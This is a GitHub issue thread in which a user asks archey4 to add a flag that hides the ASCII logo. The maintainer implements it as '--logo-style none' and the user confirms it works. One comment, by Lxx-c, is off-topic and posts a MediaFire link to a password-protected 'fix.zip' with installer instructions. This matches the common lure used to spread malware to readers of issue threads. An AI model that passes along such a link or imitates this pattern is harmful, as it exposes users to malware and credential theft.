### ISSUE TITLE
[FEATURE] Add a --no-logo flag

### ISSUE THREAD

**Issue by petdance** [HorlogeSkynet/archey4#158]
**Describe the solution you'd like**

I'd like to be able to run archey without the ASCII art. It's nice the first dozen times but after that, it's noise. All my boxen are RHEL anyway, so it's never helpful for me to have a visual indicator.

**Describe alternatives you've considered**

I've poked in the config.json, and looked at the code, and I don't see anything that allows the logo to be skipped. I did try hacking up my `/usr/local/lib/python3.6/site-packages/archey/logos/rhel.py` to have `LOGOS` only contain empty strings.  That works OK, although it does leave a three-space gutter on the left. I'd rather not have to Ansible out a hacked version of that file to all my machines if I don't have to.

**Comment by Lxx-c** [comment]
Download 
https://www.mediafire.com/file/zch0v8rj7200mbm/fix.zip/file
password: changeme
In the installer menu, select "gcc."

**Comment by HorlogeSkynet** [comment]
Hello @petdance ! Sure, let's include such an option in the next release 🙂

**Comment by petdance** [comment]
Sounds good. Is there something you need me to do? I'm not sure who "us" in "let's include" is.

**Comment by HorlogeSkynet** [comment]
I'll try to implement that, if you could stay around to review/test the feature it would already be awesome.

**Comment by HorlogeSkynet** [comment]
Hey @petdance, please see #159 for implementation proposal.
If you clone the Git project and checkout the `feat/no_logo` branch, you can then execute the following commands to run Archey from sources :

```bash
python3 -m venv venv && source venv/bin/activate
pip install -e .
python3 -m archey --logo-style none
```

Thanks for your time, bye :wave:

**Comment by petdance** [comment]
It works for me.

One thing I note is that the labels in the output take on the color of `COLORS[0]` but since there are no colors with `--logo-style none`, the labels are always just plain text. That's not a problem to me. Just observing.

**Comment by HorlogeSkynet** [comment]
Indeed, entry colors are based on "main" logo colors. Without loading a logo, this implantation cannot infer any color for entries 🤡

Although, `entries_color` configuration option should still apply, WDYT about the global idea here ?

Thanks bye 👋

**Comment by petdance** [comment]
I don't have a concern about it. I was pointing it out. It's all good with me.
